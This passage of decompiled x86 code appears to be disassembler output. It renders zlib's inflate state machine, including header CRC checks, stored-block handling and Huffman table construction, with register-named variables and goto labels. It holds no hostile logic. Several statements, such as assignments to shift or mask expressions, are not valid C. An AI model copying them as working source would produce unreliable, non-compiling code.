										goto L370;
									case 7:
										L117:
										__eflags =  *(__edi + 0x10) & 0x00001000;
										if(( *(__edi + 0x10) & 0x00001000) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x24) = 0;
											}
											goto L132;
										} else {
											__eflags = __ebp;
											if(__ebp == 0) {
												goto L103;
											} else {
												__ecx = 0;
												__eflags = 0;
												while(1) {
													__eax =  *(__ebx + __ecx) & 0x000000ff;
													__ecx = 1 + __ecx;
													 *(__esp + 0x34) = __eax;
													__eax =  *(__edi + 0x20);
													__eflags = __eax;
													if(__eax != 0) {
														__edx =  *(__eax + 0x24);
														__eflags =  *(__eax + 0x24);
														if( *(__eax + 0x24) != 0) {
															__edx =  *(__edi + 0x40);
															__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
															if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
																__eax =  *(__eax + 0x24);
																__ebx =  *(__esp + 0x34);
																 *(__eax + __edx) = __bl;
																_t213 = __edi + 0x40;
																 *_t213 = 1 +  *(__edi + 0x40);
																__eflags =  *_t213;
																__ebx =  *(__esp + 0x14);
															}
														}
													}
													__eax =  *(__esp + 0x34);
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													__eflags = __ecx - __ebp;
													if(__ecx < __ebp) {
														continue;
													}
													break;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												 *(__esp + 0x38) = __ecx;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E00410970();
													__ecx =  *(__esp + 0x44);
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x34);
												}
												__ebx = __ebx + __ecx;
												__ebp = __ebp - __ecx;
												 *(__esp + 0x14) = __ebx;
												__eflags = __eax;
												if(__eax != 0) {
													goto L103;
												} else {
													L132:
													__edx =  *(__esp + 0x10);
													 *__edi = 8;
													goto L133;
												}
											}
										}
										goto L370;
									case 8:
										L133:
										__eflags =  *(__edi + 0x10) & 0x00000200;
										if(( *(__edi + 0x10) & 0x00000200) == 0) {
											L141:
											__ecx =  *(__edi + 0x20);
											__eflags = __ecx;
											if(__ecx != 0) {
												 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
												__eax =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												__eflags = __eax;
												 *(__ecx + 0x2c) = __eax;
												__eax =  *(__edi + 0x20);
												 *( *(__edi + 0x20) + 0x30) = 1;
											}
											_push(0);
											_push(0);
											_push(0);
											__eax = E00410970();
											__ecx =  *(__esp + 0x54);
											__esp = __esp + 0xc;
											__edx =  *(__esp + 0x10);
											 *(__edi + 0x18) = __eax;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xb;
											goto L183;
										} else {
											__eflags = __esi - 0x10;
											if(__esi >= 0x10) {
												L138:
												__eax =  *(__edi + 0x18) & 0x0000ffff;
												__eflags = __edx - __eax;
												if(__edx == __eax) {
													__ecx = 0;
													__esi = 0;
													__eflags = 0;
													 *(__esp + 0x10) = 0;
													goto L141;
												} else {
													__ecx =  *(__esp + 0x48);
													 *(__ecx + 0x18) = "header crc mismatch";
													 *__edi = 0x1d;
												}
												goto L183;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x10;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L138;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 9:
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L147:
											__ecx = __edx;
											__edx = __edx << 0x10;
											__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
											__edx = __edx >> 8;
											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
											__eax = __edx >> 0x00000008 & 0x0000ff00;
											__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
											__edx = __edx >> 0x18;
											__ecx =  *(__esp + 0x48);
											__eax = __eax + __edx;
											__edx = 0;
											 *(__edi + 0x18) = __eax;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											__eflags = 0;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xa;
											goto L148;
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L147;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0xa:
										L148:
										__eflags =  *(0xc + __edi);
										if( *(0xc + __edi) == 0) {
											__eax =  *(__esp + 0x24);
											 *(0xc + __ecx) =  *(__esp + 0x24);
											__eax =  *(__esp + 0x18);
											 *(__ecx + 0x10) =  *(__esp + 0x18);
											__eax = 2;
											 *__ecx = __ebx;
											 *(__ecx + 4) = __ebp;
											 *(__edi + 0x3c) = __esi;
											_pop(__esi);
											_pop(__ebp);
											_pop(__ebx);
											 *(__edi + 0x38) = __edx;
											return 2;
										} else {
											_push(0);
											_push(0);
											_push(0);
											__eax = E00411170();
											__ecx =  *(__esp + 0x54);
											__esp = __esp + 0xc;
											__edx =  *(__esp + 0x10);
											 *(__edi + 0x18) = __eax;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xb;
											goto L150;
										}
										goto L370;
									case 0xb:
										L150:
										__eax =  *(__esp + 0x4c);
										__eflags = __eax - 5;
										if(__eax == 5) {
											L351:
											__edi =  *(__esp + 0x10);
											__edx = __eax;
											goto L105;
										} else {
											__eflags = __eax - 6;
											if(__eax == 6) {
												goto L351;
											} else {
												goto L152;
											}
										}
										goto L370;
									case 0xc:
										L152:
										__eflags =  *(__edi + 4);
										if( *(__edi + 4) == 0) {
											__eflags = __esi - 3;
											if(__esi >= 3) {
												L157:
												__eax = __edx;
												__edx = __edx >> 1;
												 *(__edi + 4) = __eax;
												__eax = __edx;
												__eax = __edx & 0x00000003;
												__eflags = __eax - 3;
												if(__eax > 3) {
													L160:
													__ecx =  *(__esp + 0x48);
													__edx = __edx >> 2;
													__esi = __esi - 3;
													 *(__esp + 0x10) = __edx;
													goto L183;
												} else {
													switch( *((intOrPtr*)(__eax * 4 +  &M0041055C))) {
														case 0:
															 *__edi = 0xd;
															goto L160;
														case 1:
															__eflags =  *(__esp + 0x4c) - 6;
															 *(__edi + 0x4c) = 0x413740;
															 *(__edi + 0x54) = 9;
															 *(__edi + 0x50) = 0x413f40;
															 *(__edi + 0x58) = 5;
															 *__edi = 0x13;
															if( *(__esp + 0x4c) != 6) {
																goto L160;
															} else {
																__edx = __edx >> 2;
																__esi = __esi - 3;
																 *(__esp + 0x10) = __edx;
																goto L103;
															}
															goto L370;
														case 2:
															_t274 = __esp + 0x48; // 0x9
															__ecx =  *_t274;
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *__edi = 0x10;
															 *(__esp + 0x10) = __edx;
															goto L183;
														case 3:
															_t276 = __esp + 0x48; // 0x9
															__ecx =  *_t276;
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *(__esp + 0x10) = __edx;
															 *(__ecx + 0x18) = "invalid block type";
															 *__edi = 0x1d;
															goto L183;
													}
												}
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 3;
													if(__esi < 3) {
														continue;
													} else {
														goto L157;
													}
													goto L370;
												}
												goto L103;
											}
										} else {
											__ecx = __esi;
											 *__edi = 0x1a;
											__ecx = __esi & 0x00000007;
											__edx = __edx >> __cl;
											__esi = __esi - __ecx;
											 *(__esp + 0x10) = __edx;
											goto L182;
										}
										goto L370;
									case 0xd:
										__esi = __esi & 0x00000007;
										__edx = __edx >> __cl;
										__esi = __esi - (__esi & 0x00000007);
										 *(__esp + 0x10) = __edx;
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L169:
											__eax = __edx;
											__ecx = __edx;
											__eax =  !__edx;
											__ecx = __edx & 0x0000ffff;
											__eax =  !__edx >> 0x10;
											__eflags = __ecx - __eax;
											if(__ecx == __eax) {
												__edx = 0;
												 *(__edi + 0x40) = __ecx;
												__esi = 0;
												 *(__esp + 0x10) = 0;
												__eflags =  *(__esp + 0x4c) - 6;
												 *__edi = 0xe;
												if( *(__esp + 0x4c) == 6) {
													__edi = 0;
													goto L104;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L173;
												}
											} else {
												__ecx =  *(__esp + 0x48);
												 *(__ecx + 0x18) = "invalid stored block lengths";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L169;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0xe:
										L173:
										 *__edi = 0xf;
										goto L174;
									case 0xf:
										L174:
										__eax =  *(__edi + 0x40);
										 *(__esp + 0x34) = __eax;
										__eflags = __eax;
										if(__eax == 0) {
											 *__edi = 0xb;
											goto L183;
										} else {
											__eflags = __eax - __ebp;
											if(__eax > __ebp) {
												__eax = __ebp;
												 *(__esp + 0x34) = __ebp;
											}
											__ecx =  *(__esp + 0x18);
											__eflags = __eax - __ecx;
											if(__eax > __ecx) {
												__eax = __ecx;
												 *(__esp + 0x34) = __eax;
											}
											__eflags = __eax;
											if(__eax == 0) {
												goto L103;
											} else {
												__eax = memcpy( *(__esp + 0x2c), __ebx, __eax);
												__eax =  *(__esp + 0x40);
												__esp = __esp + 0xc;
												 *(__esp + 0x18) =  *(__esp + 0x18) - __eax;
												__ebx = __ebx + __eax;
												 *(__esp + 0x24) =  *(__esp + 0x24) + __eax;
												__ebp = __ebp - __eax;
												_t299 = __edi + 0x40;
												 *_t299 =  *(__edi + 0x40) - __eax;
												__eflags =  *_t299;
												 *(__esp + 0x14) = __ebx;
												goto L181;
											}
										}
										goto L370;
									case 0x10:
										__eflags = __esi - 0xe;
										if(__esi >= 0xe) {
											L191:
											__eax = __edx;
											__esi = __esi - 0xe;
											__eax = __edx & 0x0000001f;
											__edx = __edx >> 5;
											 *(__edi + 0x60) = __eax;
											__eax = __edx;
											__eax = __edx & 0x0000001f;
											__edx = __edx >> 5;
											 *(__edi + 0x64) = __eax;
											__eax = __edx;
											__eax = __edx & 0x0000000f;
											__edx = __edx >> 4;
											__eax = __eax + 4;
											 *(__esp + 0x10) = __edx;
											__eflags =  *(__edi + 0x60) - 0x11e;
											 *(__edi + 0x5c) = __eax;
											if( *(__edi + 0x60) > 0x11e) {
												L204:
												 *(__ecx + 0x18) = "too many length or distance symbols";
												 *__edi = 0x1d;
												goto L183;
											} else {
												__eflags =  *(__edi + 0x64) - 0x1e;
												if( *(__edi + 0x64) > 0x1e) {
													goto L204;
												} else {
													 *(__edi + 0x68) = 0;
													 *__edi = 0x11;
													goto L194;
												}
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0xe;
												if(__esi < 0xe) {
													continue;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L191;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0x11:
										L194:
										__eax =  *(__edi + 0x68);
										__eflags =  *(__edi + 0x68) -  *(__edi + 0x5c);
										if( *(__edi + 0x68) >=  *(__edi + 0x5c)) {
											L200:
											__eflags =  *(__edi + 0x68) - 0x13;
											while( *(__edi + 0x68) < 0x13) {
												__eax =  *(__edi + 0x68);
												__ecx = 0;
												__eax =  *(0x413fc0 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												 *((short*)(__edi + 0x70 + ( *(0x413fc0 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
												 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
												__eflags =  *(__edi + 0x68) - 0x13;
											}
											__eax = __edi + 0x530;
											 *(__edi + 0x54) = 7;
											__ecx = __edi + 0x6c;
											 *(__edi + 0x4c) = __eax;
											 *(__edi + 0x6c) = __eax;
											__edx = __edi + 0x54;
											__edi + 0x2f0 = __edi + 0x70;
											__eax = E00411490(0, __edi + 0x70, 0x13, __edi + 0x6c, __edi + 0x54, __edi + 0x2f0);
											 *(__esp + 0x2c) = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												 *(__edi + 0x68) = 0;
												 *__edi = 0x12;
												goto L206;
											} else {
												__ecx =  *(__esp + 0x48);
												__edx =  *(__esp + 0x10);
												 *(__ecx + 0x18) = "invalid code lengths set";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											do {
												__eflags = __esi - 3;
												if(__esi >= 3) {
													goto L199;
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L103;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 3;
														if(__esi < 3) {
															continue;
														} else {
															goto L199;
														}
														goto L370;
													}
													goto L103;
												}
												goto L370;
												L199:
												__eax =  *(__edi + 0x68);
												__edx = __edx & 0x00000007;
												__edx = __edx >> 3;
												__esi = __esi - 3;
												 *(__esp + 0x10) = __edx;
												__eax =  *(0x413fc0 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												 *((short*)(__edi + 0x70 + ( *(0x413fc0 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
												 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
												__eax =  *(__edi + 0x68);
												__eflags =  *(__edi + 0x68) -  *(__edi + 0x5c);
											} while ( *(__edi + 0x68) <  *(__edi + 0x5c));
											goto L200;
										}
										goto L370;
									case 0x12:
										L206:
										__eax =  *(__edi + 0x64);
										__ecx =  *(__edi + 0x68);
										__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
										 *(__esp + 0x34) = __ecx;
										__eflags = __ecx - __eax;
										if(__ecx >= __eax) {
											L242:
											__eflags =  *__edi - 0x1d;
											if( *__edi == 0x1d) {
												L181:
												__edx =  *(__esp + 0x10);
												goto L182;
											} else {
												__eflags =  *((short*)(__edi + 0x270));
												if( *((short*)(__edi + 0x270)) != 0) {
													__eax = __edi + 0x530;
													 *(__edi + 0x54) = 9;
													__ecx = __edi + 0x6c;
													 *(__edi + 0x4c) = __eax;
													 *(__edi + 0x6c) = __eax;
													__edx = __edi + 0x54;
													__edi + 0x2f0 = __edi + 0x70;
													__eax = E00411490(1, __edi + 0x70,  *(__edi + 0x60), __edi + 0x6c, __edi + 0x54, __edi + 0x2f0);
													 *(__esp + 0x2c) = __eax;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__edi + 0x6c);
														__ecx = __edi + 0x6c;
														 *(__edi + 0x50) =  *(__edi + 0x6c);
														__edx = __edi + 0x58;
														__eax = __edi + 0x2f0;
														 *(__edi + 0x58) = 6;
														 *(__edi + 0x60) =  *(__edi + 0x60) + 0x38;
														__eax = __edi + ( *(__edi + 0x60) + 0x38) * 2;
														__eax = E00411490(2, __edi + ( *(__edi + 0x60) + 0x38) * 2,  *(__edi + 0x64), __edi + 0x6c, __edi + 0x58, __edi + 0x2f0);
														__edx = __eax;
														 *(__esp + 0x2c) = __edx;
														__eflags = __edx;
														if(__edx == 0) {
															__edx =  *(__esp + 0x4c);
															 *__edi = 0x13;
															__eflags =  *(__esp + 0x4c) - 6;
															if( *(__esp + 0x4c) == 6) {
																__edi =  *(__esp + 0x10);
																goto L105;
															} else {
																__edx =  *(__esp + 0x10);
																__ecx =  *(__esp + 0x48);
																goto L252;
															}
														} else {
															__ecx =  *(__esp + 0x48);
															__edx =  *(__esp + 0x10);
															 *(__ecx + 0x18) = "invalid distances set";
															 *__edi = 0x1d;
															goto L183;
														}
													} else {
														__ecx =  *(__esp + 0x48);
														__edx =  *(__esp + 0x10);
														 *(__ecx + 0x18) = "invalid literal/lengths set";
														 *__edi = 0x1d;
														goto L183;
													}
												} else {
													__ecx =  *(__esp + 0x48);
													__edx =  *(__esp + 0x10);
													 *(__ecx + 0x18) = "invalid code -- missing end-of-block";
													 *__edi = 0x1d;
													goto L183;
												}
											}
										} else {
											__edi =  *(__esp + 0x10);
											do {
												__eax =  *(__esp + 0x40);
												__edx = 1;
												__ecx =  *( *(__esp + 0x40));
												__eax =  *(__esp + 0x20);
												1 << __cl = (1 << __cl) - 1;
												__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
												__eax =  *( *(__esp + 0x20) + 0x4c);
												__eax =  *( *( *(__esp + 0x20) + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x38) = __eax;
												__eflags = (__cl & 0x000000ff) - __esi;
												if((__cl & 0x000000ff) <= __esi) {
													L212:
													__eax = __eax >> 0x10;
													__eflags = __dx - 0x10;
													if(__eflags >= 0) {
														if(__eflags != 0) {
															__eflags =  *(__esp + 0x3a) - 0x11;
															__edx =  *(__esp + 0x10);
															__ecx = __ah & 0x000000ff;
															if( *(__esp + 0x3a) != 0x11) {
																__edi = __ecx + 7;
																 *(__esp + 0x38) = __ecx;
																__eflags = __esi - __edi;
																if(__esi >= __edi) {
																	L233:
																	__edx = __edx >> __cl;
																	__edx = __edx & 0x0000007f;
																	__eax = (__edx & 0x0000007f) + 0xb;
																	__edx = __edx >> 7;
																	__eflags = __edx;
																	 *(__esp + 0x30) = __eax;
																	__eax = 0xfffffff9;
																	goto L234;
																} else {
																	while(1) {
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L103;
																		}
																		__eax =  *__ebx & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebx & 0x000000ff) << __cl;
																		__ebx = __ebx + 1;
																		__edx = __edx + __eax;
																		 *(__esp + 0x14) = __ebx;
																		__esi = __esi + 8;
																		 *(__esp + 0x10) = __edx;
																		__ebp = __ebp - 1;
																		__eflags = __esi - __edi;
																		if(__esi < __edi) {
																			continue;
																		} else {
																			__ecx =  *(__esp + 0x38);
																			goto L233;
																		}
																		goto L370;
																	}
																	goto L103;
																}
															} else {
																__edi = __ecx + 3;
																 *(__esp + 0x38) = __ecx;
																__eflags = __esi - __edi;
																if(__esi >= __edi) {
																	L227:
																	__edx = __edx >> __cl;
																	__edx = __edx & 0x00000007;
																	__eax = (__edx & 0x00000007) + 3;
																	__edx = __edx >> 3;
																	 *(__esp + 0x30) = __eax;
																	__eax = 0xfffffffd;
																	L234:
																	__edi =  *(__esp + 0x20);
																	__esi = __esi + __eax;
																	__eflags = __esi;
																	 *(__esp + 0x38) = 0;
																	__eax =  *(__esp + 0x30);
																	goto L235;
																} else {
																	while(1) {
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L103;
																		}
																		__eax =  *__ebx & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebx & 0x000000ff) << __cl;
																		__ebx = __ebx + 1;
																		__edx = __edx + __eax;
																		 *(__esp + 0x14) = __ebx;
																		__esi = __esi + 8;
																		 *(__esp + 0x10) = __edx;
																		__ebp = __ebp - 1;
																		__eflags = __esi - __edi;
																		if(__esi < __edi) {
																			continue;
																		} else {
																			__ecx =  *(__esp + 0x38);
																			goto L227;
																		}
																		goto L370;
																	}
																	goto L103;
																}
															}
														} else {
															__eax = __eax >> 8;
															__ecx = __cl & 0x000000ff;
															__ecx = (__cl & 0x000000ff) + 2;
															 *(__esp + 0x38) = __ecx;
															__eflags = __esi - __ecx;
															if(__esi >= __ecx) {
																L219:
																__edx =  *(__esp + 0x10);
																__edi =  *(__esp + 0x20);
																__ecx = __ah & 0x000000ff;
																__eax =  *(__esp + 0x34);
																__esi = __esi - (__ah & 0x000000ff);
																__edx =  *(__esp + 0x10) >> __cl;
																 *(__esp + 0x10) = __edx;
																__eflags = __eax;
																if(__eax == 0) {
																	L245:
																	__ecx =  *(__esp + 0x48);
																	 *(__ecx + 0x18) = "invalid bit length repeat";
																	 *__edi = 0x1d;
																	goto L183;
																} else {
																	 *(__esp + 0x38) = __eax;
																	__eax = __edx;
																	__eax = __edx & 0x00000003;
																	__edx = __edx >> 2;
																	__eax = __eax + 3;
																	__esi = __esi - 2;
																	 *(__esp + 0x30) = __eax;
																	L235:
																	 *(__edi + 0x64) =  *(__edi + 0x64) +  *(__edi + 0x60);
																	__eax = __eax +  *(__esp + 0x34);
																	__ebx =  *(__esp + 0x14);
																	 *(__esp + 0x10) = __edx;
																	__eflags = __eax -  *(__edi + 0x64) +  *(__edi + 0x60);
																	if(__eax >  *(__edi + 0x64) +  *(__edi + 0x60)) {
																		goto L245;
																	} else {
																		__ecx =  *(__esp + 0x30);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__edx =  *(__esp + 0x38);
																			do {
																				__eax =  *(__edi + 0x68);
																				 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __dx;
																				 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
																				__ecx = __ecx - 1;
																				__eflags = __ecx;
																			} while (__ecx != 0);
																		}
																		__ecx =  *(__esp + 0x20);
																		__edi =  *(__esp + 0x10);
																		goto L240;
																	}
																}
															} else {
																while(1) {
																	__eflags = __ebp;
																	if(__ebp == 0) {
																		goto L104;
																	}
																	__edx =  *__ebx & 0x000000ff;
																	__ecx = __esi;
																	__edx = ( *__ebx & 0x000000ff) << __cl;
																	__ebx = __ebx + 1;
																	__edi = __edi + __edx;
																	 *(__esp + 0x14) = __ebx;
																	__esi = __esi + 8;
																	 *(__esp + 0x10) = __edi;
																	__ebp = __ebp - 1;
																	__eflags = __esi -  *(__esp + 0x38);
																	if(__esi <  *(__esp + 0x38)) {
																		continue;
																	} else {
																		goto L219;
																	}
																	goto L370;
																}
																goto L104;
															}
														}
													} else {
														__eax = __eax >> 8;
														__ecx = __al & 0x000000ff;
														__eax =  *(__esp + 0x34);
														__esi = __esi - (__al & 0x000000ff);
														__edi = __edi >> __cl;
														__ecx =  *(__esp + 0x20);
														 *(__esp + 0x10) = __edi;
														 *((short*)(__ecx + 0x70 +  *(__esp + 0x34) * 2)) = __dx;
														 *(__ecx + 0x68) = 1 +  *(__ecx + 0x68);
														goto L240;
													}
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L104;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__edx = 1;
														__edi = __edi + (( *__ebx & 0x000000ff) << __cl);
														__ebx = __ebx + 1;
														__eax =  *(__esp + 0x40);
														__esi = __esi + 8;
														__ebp = __ebp - 1;
														 *(__esp + 0x10) = __edi;
														 *(__esp + 0x14) = __ebx;
														__ecx =  *( *(__esp + 0x40));
														__eax =  *(__esp + 0x20);
														1 << __cl = (1 << __cl) - 1;
														__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
														__eax =  *( *(__esp + 0x20) + 0x4c);
														__eax =  *( *( *(__esp + 0x20) + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
														__eax = __eax >> 8;
														__ecx = __cl & 0x000000ff;
														 *(__esp + 0x38) = __eax;
														__eflags = (__cl & 0x000000ff) - __esi;
														if((__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L212;
														}
														goto L370;
													}
													goto L104;
												}
												goto L370;
												L240:
												__eax =  *(__ecx + 0x64);
												__edx =  *(__ecx + 0x68);
												__eax =  *(__ecx + 0x64) +  *((intOrPtr*)(__ecx + 0x60));
												 *(__esp + 0x34) = __edx;
												__eflags = __edx - __eax;
											} while (__edx < __eax);
											__edi =  *(__esp + 0x20);
											goto L242;
										}
										goto L370;
									case 0x13:
										L252:
										 *__edi = 0x14;
										goto L253;
									case 0x14:
										L253:
										__eflags = __ebp - 6;
										if(__ebp < 6) {
											L257:
											__eax =  *(__edi + 0x4c);
											__ecx =  *(__edi + 0x54);
											 *(__esp + 0x34) =  *(__edi + 0x4c);
											1 = 1 << __cl;
											__ecx =  *(__edi + 0x4c);
											(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
											 *(__edi + 0x1bc4) = 0;
											__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edx) * 4);
											1 = 1 >> 8;
											__ecx = __cl & 0x000000ff;
											__eflags = (__cl & 0x000000ff) - __esi;
											if((__cl & 0x000000ff) <= __esi) {
												L260:
												__eflags = __al;
												if(__al == 0) {
													L267:
													__eax = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__edi + 0x1bc4) =  *(__edi + 0x1bc4) + __ecx;
													__esi = __esi - __ecx;
													__edx = __edx >> __cl;
													__ecx = __eax;
													__ecx = __eax >> 0x10;
													 *(__esp + 0x10) = __edx;
													 *(__edi + 0x40) = __ecx;
													__eflags = __al;
													if(__al != 0) {
														__eflags = __al & 0x00000020;
														if((__al & 0x00000020) == 0) {
															__eflags = __al & 0x00000040;
															if((__al & 0x00000040) == 0) {
																__eax = __al & 0x000000ff;
																__eax = __al & 0xf;
																__eflags = __eax;
																 *__edi = 0x15;
																 *(__edi + 0x48) = __eax;
																goto L274;
															} else {
																__ecx =  *(__esp + 0x48);
																 *(__ecx + 0x18) = "invalid literal/length code";
																 *__edi = 0x1d;
																goto L183;
															}
														} else {
															 *(__edi + 0x1bc4) = 0xffffffff;
															 *__edi = 0xb;
															goto L182;
														}
													} else {
														 *__edi = 0x19;
														goto L182;
													}
												} else {
													__eflags = __al & 0x000000f0;
													if((__al & 0x000000f0) != 0) {
														goto L267;
													} else {
														__ecx = __eax;
														__ebx = 1;
														__ecx = __eax >> 8;
														__edx = __eax;
														__edi = __cl & 0x000000ff;
														 *(__esp + 0x30) = __eax >> 8;
														__al & 0x000000ff = (__al & 0x000000ff) + __edi;
														__eax = __eax >> 0x10;
														__ebx = 1 << __cl;
														__ecx = __edi;
														__ebx = (1 << __cl) - 1;
														 *(__esp + 0x38) = __edx;
														(0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10) = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
														__ecx =  *(__esp + 0x34);
														__ebx = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax;
														__eax =  *( *(__esp + 0x34) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax) * 4);
														__eax = __eax >> 8;
														__edi = __cl & 0x000000ff;
														 *(__esp + 0x30) = __cl & 0x000000ff;
														__edi = (__cl & 0x000000ff) + (__cl & 0x000000ff);
														__eflags = (__cl & 0x000000ff) + (__cl & 0x000000ff) - __esi;
														if((__cl & 0x000000ff) + (__cl & 0x000000ff) <= __esi) {
															L266:
															__edi =  *(__esp + 0x20);
															__ebx =  *(__esp + 0x14);
															__ecx = __dh & 0x000000ff;
															__edx =  *(__esp + 0x10);
															__edx =  *(__esp + 0x10) >> __cl;
															__esi = __esi - __ecx;
															__eflags = __esi;
															 *(__edi + 0x1bc4) = __ecx;
															goto L267;
														} else {
															while(1) {
																__eflags = __ebp;
																if(__ebp == 0) {
																	goto L103;
																}
																__ebx =  *(__esp + 0x14);
																__ecx = __esi;
																__edi = 1;
																__esi = __esi + 8;
																__ebp = __ebp - 1;
																__eax =  *__ebx & 0x000000ff;
																__ebx = __ebx + 1;
																 *(__esp + 0x10) =  *(__esp + 0x10) + __eax;
																__eax =  *(__esp + 0x3a) & 0x0000ffff;
																 *(__esp + 0x14) = __ebx;
																__ebx = __dh & 0x000000ff;
																__dl & 0x000000ff = __ebx + (__dl & 0x000000ff);
																__edi = 1 << __cl;
																__ecx = __ebx;
																(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
																((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff);
